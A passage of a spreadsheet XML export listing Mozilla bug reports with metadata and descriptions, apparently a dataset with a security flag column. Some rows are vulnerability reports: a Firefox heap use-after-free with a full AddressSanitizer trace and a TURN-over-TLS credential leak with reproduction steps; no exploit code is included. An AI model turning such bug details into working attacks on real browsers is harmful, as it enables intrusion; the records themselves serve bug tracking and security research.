      <c r="C212" t="inlineStr">
        <is>
          <t>Lando user guide needs updating for stacked-landing support</t>
        </is>
      </c>
      <c r="D212" t="inlineStr">
        <is>
          <t>2018-11-15 07:38:17 -0800</t>
        </is>
      </c>
      <c r="E212" t="n">
        <v>1</v>
      </c>
      <c r="F212" t="n">
        <v>1</v>
      </c>
      <c r="G212" t="n">
        <v>7</v>
      </c>
      <c r="H212" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I212" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J212" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K212" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L212" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M212" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N212" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O212" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P212" t="inlineStr"/>
      <c r="Q212" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R212" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S212" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T212" t="n">
        <v>1</v>
      </c>
      <c r="U212" t="n">
        <v>0</v>
      </c>
      <c r="V212" t="n">
        <v>5</v>
      </c>
      <c r="W212" t="inlineStr">
        <is>
          <t>"View in Lando" has been replaced by "View stack in Lando".  We need to update the docs appropriately.</t>
        </is>
      </c>
      <c r="X212" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="213">
      <c r="A213" t="n">
        <v>867453</v>
      </c>
      <c r="B213" t="inlineStr">
        <is>
          <t>2013-04-30 16:51:39 -0700</t>
        </is>
      </c>
      <c r="C213" t="inlineStr">
        <is>
          <t>Update app locale data on package updates</t>
        </is>
      </c>
      <c r="D213" t="inlineStr">
        <is>
          <t>2013-05-01 17:27:26 -0700</t>
        </is>
      </c>
      <c r="E213" t="n">
        <v>1</v>
      </c>
      <c r="F213" t="n">
        <v>1</v>
      </c>
      <c r="G213" t="n">
        <v>6</v>
      </c>
      <c r="H213" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I213" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J213" t="inlineStr">
        <is>
          <t>Developer Pages</t>
        </is>
      </c>
      <c r="K213" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L213" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M213" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N213" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O213" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P213" t="inlineStr">
        <is>
          <t>p=1</t>
        </is>
      </c>
      <c r="Q213" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R213" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S213" t="inlineStr">
        <is>
          <t>2013-05-02</t>
        </is>
      </c>
      <c r="T213" t="n">
        <v>1</v>
      </c>
      <c r="U213" t="n">
        <v>0</v>
      </c>
      <c r="V213" t="n">
        <v>2</v>
      </c>
      <c r="W213" t="inlineStr">
        <is>
          <t>When a new packaged app is submitted we should update the supported locales according to the new version's manifest when it is approved.</t>
        </is>
      </c>
      <c r="X213" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="214">
      <c r="A214" t="n">
        <v>1098314</v>
      </c>
      <c r="B214" t="inlineStr">
        <is>
          <t>2014-11-13 06:08:03 -0800</t>
        </is>
      </c>
      <c r="C214" t="inlineStr">
        <is>
          <t>TLS connection to a TURN server is not being secured</t>
        </is>
      </c>
      <c r="D214" t="inlineStr">
        <is>
          <t>2015-02-25 15:58:33 -0800</t>
        </is>
      </c>
      <c r="E214" t="n">
        <v>1</v>
      </c>
      <c r="F214" t="n">
        <v>1</v>
      </c>
      <c r="G214" t="n">
        <v>3</v>
      </c>
      <c r="H214" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I214" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J214" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K214" t="inlineStr">
        <is>
          <t>33 Branch</t>
        </is>
      </c>
      <c r="L214" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M214" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N214" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O214" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P214" t="inlineStr">
        <is>
          <t>[adv-main36+]</t>
        </is>
      </c>
      <c r="Q214" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R214" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S214" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T214" t="n">
        <v>1</v>
      </c>
      <c r="U214" t="n">
        <v>0</v>
      </c>
      <c r="V214" t="n">
        <v>25</v>
      </c>
      <c r="W214" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Build ID: 20141106120505
Steps to reproduce:
Not sure about the Core's branch version. I'm using Firefox 33.1
0. Make sure your PC is firewalled, so you're able to reach ports 80 and 443 only.
1. Open http://sipml5.org/call.htm#
2. Specify credentials for a SIP server
3. Click on Expert mode button
4. Check "Enable RTCWeb Breaker"
5. Put appropriate in "WebSocket Server URL"
6. Specify ICE Servers:
[{url: 'turns:myturnserver.domain.com:443?transport=tcp',credential: 'testpass',username: 'testuser'}]
7. Save and close the expert tab
8. Log into the SIP server and make a call
Actual results:
Login credentials sent to TURN server unencrypted.
Here is a TURN server log excerpt:
83037: IPv4. tcp or tls connected to: xx.xx.238.165:29129
83037: session 000000000000001401: user &lt;&gt;: incoming packet message processed, error 401: Unauthorised
...
83037: IPv4. Local relay addr: 172.30.1.191:49765
83037: session 000000000000001401: new, username=&lt;testuser&gt;, lifetime=3600
83037: session 000000000000001401: user &lt;testuser&gt;: incoming packet ALLOCATE processed, success
....
Expected results:
Traffic to TURN server should be encrypted.
Here is how the TURN's log should look like:
83210: IPv4. tcp or tls connected to: xx.xx.238.165:20493
83210: session 000000000000001430: user &lt;&gt;: incoming packet message processed, error 401: Unauthorised
83210: IPv4. Local relay addr: 172.30.1.191:53728
83210: session 000000000000001430: new, username=&lt;testuser&gt;, lifetime=600, cipher=ECDHE-RSA-AES256-SHA, method=TLSv1.2 (TLSv1.2)
83210: session 000000000000001430: user &lt;testuser&gt;: incoming packet ALLOCATE processed, success
...
Same settings under Chrome browser work correctly.</t>
        </is>
      </c>
      <c r="X214" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="215">
      <c r="A215" t="n">
        <v>865569</v>
      </c>
      <c r="B215" t="inlineStr">
        <is>
          <t>2013-04-24 23:13:46 -0700</t>
        </is>
      </c>
      <c r="C215" t="inlineStr">
        <is>
          <t>Poison nsView</t>
        </is>
      </c>
      <c r="D215" t="inlineStr">
        <is>
          <t>2018-08-29 15:24:07 -0700</t>
        </is>
      </c>
      <c r="E215" t="n">
        <v>1</v>
      </c>
      <c r="F215" t="n">
        <v>1</v>
      </c>
      <c r="G215" t="n">
        <v>3</v>
      </c>
      <c r="H215" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I215" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J215" t="inlineStr">
        <is>
          <t>Web Painting</t>
        </is>
      </c>
      <c r="K215" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L215" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M215" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N215" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O215" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P215" t="inlineStr">
        <is>
          <t>[adv-main22+]</t>
        </is>
      </c>
      <c r="Q215" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R215" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S215" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T215" t="n">
        <v>1</v>
      </c>
      <c r="U215" t="n">
        <v>0</v>
      </c>
      <c r="V215" t="n">
        <v>10</v>
      </c>
      <c r="W215" t="inlineStr">
        <is>
          <t>This is to mitigate crashes like bug 850571 to some degree,
and to make the crash more likely to occur so we can get STR.</t>
        </is>
      </c>
      <c r="X215" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="216">
      <c r="A216" t="n">
        <v>1373245</v>
      </c>
      <c r="B216" t="inlineStr">
        <is>
          <t>2017-06-15 07:12:39 -0700</t>
        </is>
      </c>
      <c r="C216" t="inlineStr">
        <is>
          <t>Send New Relic custom attributes as the correct data type</t>
        </is>
      </c>
      <c r="D216" t="inlineStr">
        <is>
          <t>2017-06-15 09:15:37 -0700</t>
        </is>
      </c>
      <c r="E216" t="n">
        <v>1</v>
      </c>
      <c r="F216" t="n">
        <v>1</v>
      </c>
      <c r="G216" t="n">
        <v>7</v>
      </c>
      <c r="H216" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I216" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J216" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K216" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L216" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M216" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N216" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O216" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P216" t="inlineStr"/>
      <c r="Q216" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R216" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S216" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T216" t="n">
        <v>1</v>
      </c>
      <c r="U216" t="n">
        <v>0</v>
      </c>
      <c r="V216" t="n">
        <v>3</v>
      </c>
      <c r="W216" t="inlineStr">
        <is>
          <t>New Relic tries to auto-detect data types (and this can partly be adjusted [1]), but it helps if we send things we wanted graphed as ints/floats, but things that shouldn't (eg job_id) as strings not ints.
[1] https://insights.newrelic.com/accounts/677903/manage/formatter?eventType=Transaction</t>
        </is>
      </c>
      <c r="X216" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="217">
      <c r="A217" t="n">
        <v>1289970</v>
      </c>
      <c r="B217" t="inlineStr">
        <is>
          <t>2016-07-27 19:54:09 -0700</t>
        </is>
      </c>
      <c r="C217" t="inlineStr">
        <is>
          <t>UAF in mozilla::nsTextNodeDirectionalityMap::RemoveElementFromMap</t>
        </is>
      </c>
      <c r="D217" t="inlineStr">
        <is>
          <t>2024-05-30 09:19:40 -0700</t>
        </is>
      </c>
      <c r="E217" t="n">
        <v>1</v>
      </c>
      <c r="F217" t="n">
        <v>1</v>
      </c>
      <c r="G217" t="n">
        <v>3</v>
      </c>
      <c r="H217" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I217" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J217" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K217" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L217" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M217" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N217" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O217" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P217" t="inlineStr">
        <is>
          <t>[adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q217" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R217" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S217" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T217" t="n">
        <v>1</v>
      </c>
      <c r="U217" t="n">
        <v>0</v>
      </c>
      <c r="V217" t="n">
        <v>15</v>
      </c>
      <c r="W217" t="inlineStr">
        <is>
          <t>Created attachment 8775408
crash.html
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Steps to reproduce:
Run the attached file (crash.html), it may take a few seconds to crash. 
Test on Mozilla Firefox 50.0a1, Mozilla Firefox 47.0.1 x86/x86_64
Actual results:
The firefox crashed, following is the ASAN report :
==10914==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d000511b10 at pc 0x7f48178af2af bp 0x7ffe1abc7df0 sp 0x7ffe1abc7de8
READ of size 4 at 0x60d000511b10 thread T0
    #0 0x7f48178af2ae in GetBoolFlag /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/base/nsINode.h:1527:12
    #1 0x7f48178af2ae in HasTextNodeDirectionalityMap /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/base/nsINode.h:1612
    #2 0x7f48178af2ae in RemoveElementFromMap /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/base/DirectionalityUtils.cpp:550
    #3 0x7f48178af2ae in mozilla::ResetDir(mozilla::dom::Element*) /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/base/DirectionalityUtils.cpp:1007
    #4 0x7f48178c52cc in mozilla::dom::Element::UnbindFromTree(bool, bool) /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/base/Element.cpp:1849:5
    #5 0x7f481a4ecbe9 in nsGenericHTMLElement::UnbindFromTree(bool, bool) /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/html/nsGenericHTMLElement.cpp:583:3
    #6 0x7f4817934e1d in ContentUnbinder::UnbindSubtree(nsIContent*) /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/base/FragmentOrElement.cpp:1274:9
    #7 0x7f48179347b5 in ContentUnbinder::Run() /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/base/FragmentOrElement.cpp:1285:9
    #8 0x7f4814473c98 in nsThread::ProcessNextEvent(bool, bool*) /home/dazhuang/workspace/mozilla-central/mozilla-central/xpcom/threads/nsThread.cpp:1029:7
    #9 0x7f48144fbacc in NS_ProcessNextEvent(nsIThread*, bool) /home/dazhuang/workspace/mozilla-central/mozilla-central/xpcom/glue/nsThreadUtils.cpp:290:10
    #10 0x7f481554c06f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/dazhuang/workspace/mozilla-central/mozilla-central/ipc/glue/MessagePump.cpp:100:21
    #11 0x7f4815436188 in RunInternal /home/dazhuang/workspace/mozilla-central/mozilla-central/ipc/chromium/src/base/message_loop.cc:235:3
    #12 0x7f4815436188 in RunHandler /home/dazhuang/workspace/mozilla-central/mozilla-central/ipc/chromium/src/base/message_loop.cc:228
    #13 0x7f4815436188 in MessageLoop::Run() /home/dazhuang/workspace/mozilla-central/mozilla-central/ipc/chromium/src/base/message_loop.cc:208
    #14 0x7f481ba89f3f in nsBaseAppShell::Run() /home/dazhuang/workspace/mozilla-central/mozilla-central/widget/nsBaseAppShell.cpp:156:3
    #15 0x7f481dc96db1 in nsAppStartup::Run() /home/dazhuang/workspace/mozilla-central/mozilla-central/toolkit/components/startup/nsAppStartup.cpp:284:19
    #16 0x7f481ddfc45a in XREMain::XRE_mainRun() /home/dazhuang/workspace/mozilla-central/mozilla-central/toolkit/xre/nsAppRunner.cpp:4391:10
    #17 0x7f481ddfd9ee in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/dazhuang/workspace/mozilla-central/mozilla-central/toolkit/xre/nsAppRunner.cpp:4495:8
    #18 0x7f481ddfe8bf in XRE_main /home/dazhuang/workspace/mozilla-central/mozilla-central/toolkit/xre/nsAppRunner.cpp:4600:16
    #19 0x4e0cdb in do_main /home/dazhuang/workspace/mozilla-central/mozilla-central/browser/app/nsBrowserApp.cpp:254:10
    #20 0x4e0cdb in main /home/dazhuang/workspace/mozilla-central/mozilla-central/browser/app/nsBrowserApp.cpp:427
    #21 0x7f483203d57f in __libc_start_main /usr/src/debug/glibc-2.22/csu/libc-start.c:289
    #22 0x41cb18 in _start (/home/dazhuang/workspace/mozilla-central/mozilla-central/objdir-ff-asan/dist/bin/firefox+0x41cb18)
0x60d000511b10 is located 48 bytes inside of 136-byte region [0x60d000511ae0,0x60d000511b68)
freed by thread T0 here:
    #0 0x4b321b in __interceptor_free /home/nikola/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7f481434d5e4 in SnowWhiteKiller::~SnowWhiteKiller() /home/dazhuang/workspace/mozilla-central/mozilla-central/xpcom/base/nsCycleCollector.cpp:2685:9
    #2 0x7f481433dab6 in nsCycleCollector::FreeSnowWhite(bool) /home/dazhuang/workspace/mozilla-central/mozilla-central/xpcom/base/nsCycleCollector.cpp:2859:3
    #3 0x7f481666a01e in AsyncFreeSnowWhite::Run() /home/dazhuang/workspace/mozilla-central/mozilla-central/js/xpconnect/src/XPCJSRuntime.cpp:142:34
    #4 0x7f4814473c98 in nsThread::ProcessNextEvent(bool, bool*) /home/dazhuang/workspace/mozilla-central/mozilla-central/xpcom/threads/nsThread.cpp:1029:7
    #5 0x7f48144fbacc in NS_ProcessNextEvent(nsIThread*, bool) /home/dazhuang/workspace/mozilla-central/mozilla-central/xpcom/glue/nsThreadUtils.cpp:290:10
    #6 0x7f481554c06f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/dazhuang/workspace/mozilla-central/mozilla-central/ipc/glue/MessagePump.cpp:100:21
    #7 0x7f4815436188 in RunInternal /home/dazhuang/workspace/mozilla-central/mozilla-central/ipc/chromium/src/base/message_loop.cc:235:3
    #8 0x7f4815436188 in RunHandler /home/dazhuang/workspace/mozilla-central/mozilla-central/ipc/chromium/src/base/message_loop.cc:228
    #9 0x7f4815436188 in MessageLoop::Run() /home/dazhuang/workspace/mozilla-central/mozilla-central/ipc/chromium/src/base/message_loop.cc:208
    #10 0x7f481ba89f3f in nsBaseAppShell::Run() /home/dazhuang/workspace/mozilla-central/mozilla-central/widget/nsBaseAppShell.cpp:156:3
    #11 0x7f481dc96db1 in nsAppStartup::Run() /home/dazhuang/workspace/mozilla-central/mozilla-central/toolkit/components/startup/nsAppStartup.cpp:284:19
    #12 0x7f481ddfc45a in XREMain::XRE_mainRun() /home/dazhuang/workspace/mozilla-central/mozilla-central/toolkit/xre/nsAppRunner.cpp:4391:10
    #13 0x7f481ddfd9ee in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/dazhuang/workspace/mozilla-central/mozilla-central/toolkit/xre/nsAppRunner.cpp:4495:8
    #14 0x7f481ddfe8bf in XRE_main /home/dazhuang/workspace/mozilla-central/mozilla-central/toolkit/xre/nsAppRunner.cpp:4600:16
    #15 0x4e0cdb in do_main /home/dazhuang/workspace/mozilla-central/mozilla-central/browser/app/nsBrowserApp.cpp:254:10
    #16 0x4e0cdb in main /home/dazhuang/workspace/mozilla-central/mozilla-central/browser/app/nsBrowserApp.cpp:427
    #17 0x7f483203d57f in __libc_start_main /usr/src/debug/glibc-2.22/csu/libc-start.c:289
previously allocated by thread T0 here:
    #0 0x4b353b in __interceptor_malloc /home/nikola/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e186d in moz_xmalloc /home/dazhuang/workspace/mozilla-central/mozilla-central/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f48176f1167 in operator new /home/dazhuang/workspace/mozilla-central/mozilla-central/objdir-ff-asan/dist/include/mozilla/mozalloc.h:193:12
    #3 0x7f48176f1167 in nsContentUtils::SetNodeTextContent(nsIContent*, nsAString_internal const&amp;, bool) /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/base/nsContentUtils.cpp:4622
    #4 0x7f481790d11f in mozilla::dom::FragmentOrElement::SetTextContentInternal(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/base/FragmentOrElement.cpp:1179:12
    #5 0x7f481869341d in SetTextContent /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/base/nsINode.h:1250:5
    #6 0x7f481869341d in mozilla::dom::NodeBinding::set_textContent(JSContext*, JS::Handle&lt;JSObject*&gt;, nsINode*, JSJitSetterCallArgs) /home/dazhuang/workspace/mozilla-central/mozilla-central/objdir-ff-asan/dom/bindings/NodeBinding.cpp:561
    #7 0x7f4819d15ede in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/bindings/BindingUtils.cpp:2752:8
    #8 0x7f48203493f0 in CallJSNative /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/jscntxtinlines.h:235:15
    #9 0x7f48203493f0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/vm/Interpreter.cpp:452
    #10 0x7f482034b648 in InternalCall /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/vm/Interpreter.cpp:497:12
    #11 0x7f482034b648 in Call /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/vm/Interpreter.cpp:516
    #12 0x7f482034b648 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/vm/Interpreter.cpp:641
    #13 0x7f48203bd19e in SetExistingProperty /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/vm/NativeObject.cpp:2370:10
    #14 0x7f48203bd19e in js::NativeSetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::QualifiedBool, JS::ObjectOpResult&amp;) /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/vm/NativeObject.cpp:2405
    #15 0x7f4820329002 in SetProperty /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/vm/NativeObject.h:1525:12
    #16 0x7f4820329002 in SetPropertyOperation /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/vm/Interpreter.cpp:256
    #17 0x7f4820329002 in Interpret(JSContext*, js::RunState&amp;) /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/vm/Interpreter.cpp:2666
    #18 0x7f4820316588 in js::RunScript(JSContext*, js::RunState&amp;) /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/vm/Interpreter.cpp:398:12
    #19 0x7f4820349ab8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/vm/Interpreter.cpp:470:15
    #20 0x7f482034a191 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/vm/Interpreter.cpp:516:10
    #21 0x7f481fe286a8 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/dazhuang/workspace/mozilla-central/mozilla-central/js/src/jsapi.cpp:2888:12
    #22 0x7f48197cc910 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/dazhuang/workspace/mozilla-central/mozilla-central/objdir-ff-asan/dom/bindings/EventHandlerBinding.cpp:259:37
    #23 0x7f481a192119 in Call&lt;nsISupports *&gt; /home/dazhuang/workspace/mozilla-central/mozilla-central/objdir-ff-asan/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #24 0x7f481a192119 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/events/JSEventHandler.cpp:214
    #25 0x7f481a15e957 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/events/EventListenerManager.cpp:1122:16
    #26 0x7f481a16058d in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/events/EventListenerManager.cpp:1294:17
    #27 0x7f481a13a6ec in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/events/EventDispatcher.cpp:379:5
    #28 0x7f481a13e3b0 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/events/EventDispatcher.cpp:710:9
    #29 0x7f481c3a6926 in nsDocumentViewer::LoadComplete(nsresult) /home/dazhuang/workspace/mozilla-central/mozilla-central/layout/base/nsDocumentViewer.cpp:996:7
    #30 0x7f481d2a45c5 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/dazhuang/workspace/mozilla-central/mozilla-central/docshell/base/nsDocShell.cpp:7559:5
    #31 0x7f481d2a0661 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/dazhuang/workspace/mozilla-central/mozilla-central/docshell/base/nsDocShell.cpp:7360:7
    #32 0x7f481d2a77df in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/dazhuang/workspace/mozilla-central/mozilla-central/docshell/base/nsDocShell.cpp:7257:13
    #33 0x7f4816b94be1 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/dazhuang/workspace/mozilla-central/mozilla-central/uriloader/base/nsDocLoader.cpp:1250:3
    #34 0x7f4816b93a94 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/dazhuang/workspace/mozilla-central/mozilla-central/uriloader/base/nsDocLoader.cpp:834:5
    #35 0x7f4816b906dd in nsDocLoader::DocLoaderIsEmpty(bool) /home/dazhuang/workspace/mozilla-central/mozilla-central/uriloader/base/nsDocLoader.cpp:724:9
    #36 0x7f4816b92854 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/dazhuang/workspace/mozilla-central/mozilla-central/uriloader/base/nsDocLoader.cpp:608:5
    #37 0x7f4816b936ac in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/dazhuang/workspace/mozilla-central/mozilla-central/uriloader/base/nsDocLoader.cpp:464:14
    #38 0x7f481466111b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/dazhuang/workspace/mozilla-central/mozilla-central/netwerk/base/nsLoadGroup.cpp:633:18
SUMMARY: AddressSanitizer: heap-use-after-free /home/dazhuang/workspace/mozilla-central/mozilla-central/dom/base/nsINode.h:1527:12 in GetBoolFlag
Shadow bytes around the buggy address:
  0x0c1a8009a310: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a8009a320: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1a8009a330: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
  0x0c1a8009a340: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1a8009a350: 00 00 00 fa fa fa fa fa fa fa fa fa fd fd fd fd
=&gt;0x0c1a8009a360: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c1a8009a370: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
  0x0c1a8009a380: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
  0x0c1a8009a390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1a8009a3a0: 00 fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
